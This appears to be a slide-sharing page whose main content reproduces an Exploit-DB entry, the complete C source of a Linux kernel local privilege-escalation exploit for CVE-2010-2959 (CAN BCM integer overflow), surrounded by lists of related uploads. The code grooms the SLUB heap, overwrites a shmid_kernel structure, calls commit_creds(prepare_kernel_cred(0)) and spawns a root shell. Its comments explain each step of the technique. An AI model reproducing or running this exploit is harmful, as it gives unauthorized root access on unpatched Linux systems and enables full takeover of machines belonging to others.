Instalando e configurando o serviço snmpd no red hat 5.3 cent_os
Instalando e configurando o serviço snmpd no red hat 5.3   cent_osInstalando e configurando o serviço snmpd no red hat 5.3   cent_os
Instalando e configurando o serviço snmpd no red hat 5.3 cent_osCarlos Eduardo
 

Más de Carlos Eduardo (20)

Criando plugin para o Nagios em Shell Script _ Nagios
Criando plugin para o Nagios em Shell Script _ NagiosCriando plugin para o Nagios em Shell Script _ Nagios
Criando plugin para o Nagios em Shell Script _ Nagios
 
Iptables bridging and firewalling
Iptables bridging and firewallingIptables bridging and firewalling
Iptables bridging and firewalling
 
Alterar nome do_domínio–rendom_win-2008_e_2003
Alterar nome do_domínio–rendom_win-2008_e_2003Alterar nome do_domínio–rendom_win-2008_e_2003
Alterar nome do_domínio–rendom_win-2008_e_2003
 
Configuração dns memorial descritivo
Configuração dns   memorial descritivoConfiguração dns   memorial descritivo
Configuração dns memorial descritivo
 
Additional resources repositories_rpm_forge - centos wiki
Additional resources repositories_rpm_forge - centos wikiAdditional resources repositories_rpm_forge - centos wiki
Additional resources repositories_rpm_forge - centos wiki
 
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
Postfix amavisd   connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...Postfix amavisd   connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
 
Migrate linux user password to postfix vmail database
Migrate linux user password to postfix vmail databaseMigrate linux user password to postfix vmail database
Migrate linux user password to postfix vmail database
 
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
 
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
 
How to root phones or tablets running android 2.3 gingerbread jailbreak an...
How to root phones or tablets running android 2.3 gingerbread    jailbreak an...How to root phones or tablets running android 2.3 gingerbread    jailbreak an...
How to root phones or tablets running android 2.3 gingerbread jailbreak an...
 
Compartilhamento no samba com permissão de grupo
Compartilhamento no samba com permissão de grupoCompartilhamento no samba com permissão de grupo
Compartilhamento no samba com permissão de grupo
 
Canivete shell
Canivete shellCanivete shell
Canivete shell
 
Lsof
LsofLsof
Lsof
 
Converting parallels or vm ware to virtual box
Converting parallels or vm ware to virtual boxConverting parallels or vm ware to virtual box
Converting parallels or vm ware to virtual box
 
Startup guide for kvm on cent os 6
Startup guide for kvm on cent os 6Startup guide for kvm on cent os 6
Startup guide for kvm on cent os 6
 
Alterar memória kvm virtual machine
Alterar memória kvm virtual machineAlterar memória kvm virtual machine
Alterar memória kvm virtual machine
 
Comando kvm terminal
Comando kvm terminalComando kvm terminal
Comando kvm terminal
 
Instalação geo ip
Instalação geo ipInstalação geo ip
Instalação geo ip
 
Otimizando seu Squid
Otimizando seu SquidOtimizando seu Squid
Otimizando seu Squid
 
Instalando e configurando o serviço snmpd no red hat 5.3 cent_os
Instalando e configurando o serviço snmpd no red hat 5.3   cent_osInstalando e configurando o serviço snmpd no red hat 5.3   cent_os
Instalando e configurando o serviço snmpd no red hat 5.3 cent_os
 

Último

Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...panagenda
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditSkynet Technologies
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 

Último (20)

Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance Audit
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 

Exploit access root to kernel 2.6.32 2.6.36 privilege escalation exploit

  • 1. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit EDB-ID: 14814 CVE: 2010-2959 OSVDB-ID: N/A Rating Overall: Author: Jon Oberheide Published: 2010-08-27 Verified: 1 2 Exploit Code: Vulnerable App: N/A 3 4 5 (5.0) view source print? /* * i-CAN-haz-MODHARDEN.c * * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959 * * Ben Hawkes discovered an integer overflow in the Controller Area Network * (CAN) subsystem when setting up frame content and filtering certain * messages. An attacker could send specially crafted CAN traffic to crash * the system or gain root privileges. * * Usage: * * $ gcc i-can-haz-modharden.c -o i-can-haz-modharden * $ ./i-can-haz-modharden * ... * [+] launching root shell! * # id * uid=0(root) gid=0(root) * * Notes: * * The allocation pattern of the CAN BCM module gives us some desirable * properties for smashing the SLUB. We control the kmalloc with a 16-byte * granularity allowing us to place our allocation in the SLUB cache of our * choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for * old-times sake). The allocation can also be made in its own discrete * stage before the overwrite which allows us to be a bit more conservative * in ensuring the proper layout of our SLUB cache. * * To exploit the vulnerability, we first create a BCM RX op with a crafted * nframes to trigger the integer overflow during the kmalloc. On the second * call to update the existing RX op, we bypass the E2BIG check since the * stored nframes in the op is large, yet has an insufficiently sized * allocation associated with it. We then have a controlled write into the * adjacent shmid_kernel object in the 96-byte SLUB cache. 
* * However, while we control the length of the SLUB overwrite via a * memcpy_fromiovec operation, there exists a memset operation that directly * follows which zeros out last_frames, likely an adjacent allocation, with * the same malformed length, effectively nullifying our shmid smash. To * work around this, we take advantage of the fact that copy_from_user can * perform partial writes on x86 and trigger an EFAULT by setting up a * truncated memory mapping as the source for the memcpy_fromiovec operation, * allowing us to smash the necessary amount of memory and then pop out and * return early before the memset operation occurs. * * We then perform a dry-run and detect the shmid smash via an EIDRM errno * from shmat() caused by an invalid ipc_perm sequence number. Once we're * sure we have a shmid_kernel under our control we re-smash it with the * malformed version and redirect control flow to our credential modifying * calls mapped in user space. * * Distros: please use grsecurity's MODHARDEN or SELinux's module_request * to restrict unprivileged loading of uncommon packet families. Allowing 1 de 8 17/2/2012 14:55
  • 2. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ * the loading of poorly-written PF modules just adds a non-trivial and * unnecessary attack surface to the kernel. * * Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports * easily to other vulnerable kernels/distros. Careful, it could use some * post-exploitation stability love as well. * * Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that * this exploit borrows code from. */ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <fcntl.h> #include <limits.h> #include <inttypes.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/mman.h> #include <sys/stat.h> #define SLUB "kmalloc-96" #define ALLOCATION 96 #define FILLER 100 #ifndef PF_CAN #define PF_CAN 29 #endif #ifndef CAN_BCM #define CAN_BCM 2 #endif struct sockaddr_can { sa_family_t can_family; int can_ifindex; union { struct { uint32_t rx_id, tx_id; } tp; } can_addr; }; struct can_frame { uint32_t can_id; uint8_t can_dlc; uint8_t data[8] __attribute__((aligned(8))); }; struct bcm_msg_head { uint32_t opcode; uint32_t flags; uint32_t count; struct timeval ival1, ival2; uint32_t can_id; uint32_t nframes; struct can_frame frames[0]; }; #define RX_SETUP 5 #define RX_DELETE 6 #define CFSIZ sizeof(struct can_frame) #define MHSIZ sizeof(struct bcm_msg_head) #define IPCMNI 32768 #define EIDRM 43 #define HDRLEN_KMALLOC 8 struct list_head { struct list_head *next; struct list_head *prev; }; struct super_block { struct list_head s_list; unsigned int s_dev; unsigned long s_blocksize; unsigned char s_blocksize_bits; unsigned char s_dirt; uint64_t s_maxbytes; void *s_type; void *s_op; 2 de 8 17/2/2012 14:55
  • 3. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ void *dq_op; void *s_qcop; void *s_export_op; unsigned long s_flags; } super_block; struct mutex { unsigned int count; unsigned int wait_lock; struct list_head wait_list; void *owner; }; struct inode { struct list_head i_hash; struct list_head i_list; struct list_head i_sb_list; struct list_head i_dentry_list; unsigned long i_ino; unsigned int i_count; unsigned int i_nlink; unsigned int i_uid; unsigned int i_gid; unsigned int i_rdev; uint64_t i_version; uint64_t i_size; unsigned int i_size_seqcount; long i_atime_tv_sec; long i_atime_tv_nsec; long i_mtime_tv_sec; long i_mtime_tv_nsec; long i_ctime_tv_sec; long i_ctime_tv_nsec; uint64_t i_blocks; unsigned int i_blkbits; unsigned short i_bytes; unsigned short i_mode; unsigned int i_lock; struct mutex i_mutex; unsigned int i_alloc_sem_activity; unsigned int i_alloc_sem_wait_lock; struct list_head i_alloc_sem_wait_list; void *i_op; void *i_fop; struct super_block *i_sb; void *i_flock; void *i_mapping; char i_data[84]; void *i_dquot_1; void *i_dquot_2; struct list_head i_devices; void *i_pipe_union; unsigned int i_generation; unsigned int i_fsnotify_mask; void *i_fsnotify_mark_entries; struct list_head inotify_watches; struct mutex inotify_mutex; } inode; struct dentry { unsigned int d_count; unsigned int d_flags; unsigned int d_lock; int d_mounted; void *d_inode; struct list_head d_hash; void *d_parent; } dentry; struct file_operations { void *owner; void *llseek; void *read; void *write; void *aio_read; void *aio_write; void *readdir; 3 de 8 17/2/2012 14:55
  • 4. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ void *poll; void *ioctl; void *unlocked_ioctl; void *compat_ioctl; void *mmap; void *open; void *flush; void *release; void *fsync; void *aio_fsync; void *fasync; void *lock; void *sendpage; void *get_unmapped_area; void *check_flags; void *flock; void *splice_write; void *splice_read; void *setlease; } op; struct vfsmount { struct list_head mnt_hash; void *mnt_parent; void *mnt_mountpoint; void *mnt_root; void *mnt_sb; struct list_head mnt_mounts; struct list_head mnt_child; int mnt_flags; const char *mnt_devname; struct list_head mnt_list; struct list_head mnt_expire; struct list_head mnt_share; struct list_head mnt_slave_list; struct list_head mnt_slave; struct vfsmount *mnt_master; struct mnt_namespace *mnt_ns; int mnt_id; int mnt_group_id; int mnt_count; } vfsmount; struct file { struct list_head fu_list; struct vfsmount *f_vfsmnt; struct dentry *f_dentry; void *f_op; unsigned int f_lock; unsigned long f_count; } file; struct kern_ipc_perm { unsigned int lock; int deleted; int id; unsigned int key; unsigned int uid; unsigned int gid; unsigned int cuid; unsigned int cgid; unsigned int mode; unsigned int seq; void *security; }; struct shmid_kernel { struct kern_ipc_perm shm_perm; struct file *shm_file; unsigned long shm_nattch; unsigned long shm_segsz; time_t shm_atim; time_t shm_dtim; time_t shm_ctim; unsigned int shm_cprid; unsigned int shm_lprid; void *mlock_user; 4 de 8 17/2/2012 14:55
  • 5. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ } shmid_kernel; typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int __attribute__((regparm(3))) kernel_code(struct file *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %sn", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %sn", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '0'; } } } if (ret == 0) { fscanf(f, "%sn", sname); continue; } if (!strcmp(name, sname)) { printf("[+] resolved symbol %s to %pn", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int check_slabinfo(char *cache, int *active_out, int *total_out) { FILE *fp; char name[64], slab[256]; int active, total, diff; memset(slab, 0, sizeof(slab)); memset(name, 0, sizeof(name)); fp = fopen("/proc/slabinfo", "r"); if (!fp) { printf("[-] sorry, /proc/slabinfo is not available!"); exit(1); } fgets(slab, sizeof(slab) - 1, fp); while (1) { 5 de 8 17/2/2012 14:55
  • 6. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ fgets(slab, sizeof(slab) - 1, fp); sscanf(slab, "%s %u %u", name, &active, &total); diff = total - active; if (strcmp(name, cache) == 0) { break; } } fclose(fp); if (active_out) { *active_out = active; } if (total_out) { *total_out = total; } return diff; } void trigger(void) { int *shmids; int i, ret, sock, cnt, base, smashed; int diff, active, total, active_new, total_new; int len, sock_len, mmap_len; struct sockaddr_can addr; struct bcm_msg_head *msg; void *efault; char *buf; printf("[+] creating PF_CAN socket...n"); sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM); if (sock < 0) { printf("[-] kernel lacks CAN packet family supportn"); exit(1); } printf("[+] connecting PF_CAN socket...n"); memset(&addr, 0, sizeof(addr)); addr.can_family = PF_CAN; ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr)); if (sock < 0) { printf("[-] could not connect CAN socketn"); exit(1); } len = MHSIZ + (CFSIZ * (ALLOCATION / 16)); msg = malloc(len); memset(msg, 0, len); msg->can_id = 2959; msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1; printf("[+] clearing out any active OPs via RX_DELETE...n"); msg->opcode = RX_DELETE; ret = send(sock, msg, len, 0); printf("[+] removing any active user-owned shmids...n"); system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;"); printf("[+] massaging " SLUB " SLUB cache with dummy allocationsn"); diff = check_slabinfo(SLUB, &active, &total); shmids = malloc(sizeof(int) * diff * 10); cnt = diff * 10; for (i = 0; i < cnt; ++i) { diff = check_slabinfo(SLUB, &active, &total); if (diff == 0) { break; } shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } base = i; if (diff != 0) { printf("[-] inconsistency detected with SLUB cache allocation, please try againn"); exit(1); } printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...n"); i = base; cnt = i + FILLER; 
for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } msg->opcode = RX_SETUP; ret = send(sock, msg, len, 0); 6 de 8 17/2/2012 14:55
  • 7. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ if (ret < 0) { printf("[-] kernel rejected malformed CAN headern"); exit(1); } i = base + FILLER; cnt = i + FILLER; for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...n"); mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3); sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4); efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); printf("[+] mmap'ed mapping of length %d at %pn", mmap_len, efault); printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...n"); msg = (struct bcm_msg_head *) efault; memset(msg, 0, mmap_len); msg->can_id = 2959; msg->nframes = (ALLOCATION / 16) * 4; msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!n"); exit(1); } printf("[+] seeking out the smashed shmid_kernel...n"); i = base; cnt = i + FILLER + FILLER; for (; i < cnt; ++i) { ret = (int) shmat(shmids[i], NULL, SHM_RDONLY); if (ret == -1 && errno == EIDRM) { smashed = i; break; } } if (i == cnt) { printf("[-] could not find smashed shmid, trying running the exploit again!n"); exit(1); } printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %dn", i, shmids[i]); printf("[+] re-smashing the shmid_kernel with exploit payload...n"); shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI; buf = (char *) msg; memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel)); msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!n"); exit(1); } ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY); if (ret == -1 && errno != EIDRM) { setresuid(0, 0, 0); setresgid(0, 0, 0); printf("[+] launching 
root shell!n"); execl("/bin/bash", "/bin/bash", NULL); exit(0); } printf("[-] exploit failed! retry?n"); } void setup(void) { printf("[+] looking for symbols...n"); commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("[-] symbol table not availabe, aborting!n"); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("[-] symbol table not availabe, aborting!n"); } printf("[+] setting up exploit payload...n"); super_block.s_flags = 0; inode.i_size = 4096; 7 de 8 17/2/2012 14:55
  • 8. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ inode.i_sb = &super_block; inode.inotify_watches.next = &inode.inotify_watches; inode.inotify_watches.prev = &inode.inotify_watches; inode.inotify_mutex.count = 1; dentry.d_count = 4096; dentry.d_flags = 4096; dentry.d_parent = NULL; dentry.d_inode = &inode; op.mmap = &kernel_code; op.get_unmapped_area = &kernel_code; vfsmount.mnt_flags = 0; vfsmount.mnt_count = 1; file.fu_list.prev = &file.fu_list; file.fu_list.next = &file.fu_list; file.f_dentry = &dentry; file.f_vfsmnt = &vfsmount; file.f_op = &op; shmid_kernel.shm_perm.key = IPC_PRIVATE; shmid_kernel.shm_perm.uid = getuid(); shmid_kernel.shm_perm.gid = getgid(); shmid_kernel.shm_perm.cuid = getuid(); shmid_kernel.shm_perm.cgid = getgid(); shmid_kernel.shm_perm.mode = -1; shmid_kernel.shm_file = &file; } int main(int argc, char **argv) { setup(); trigger(); return 0; } Comments No comments so far © Offensive Security 2011 8 de 8 17/2/2012 14:55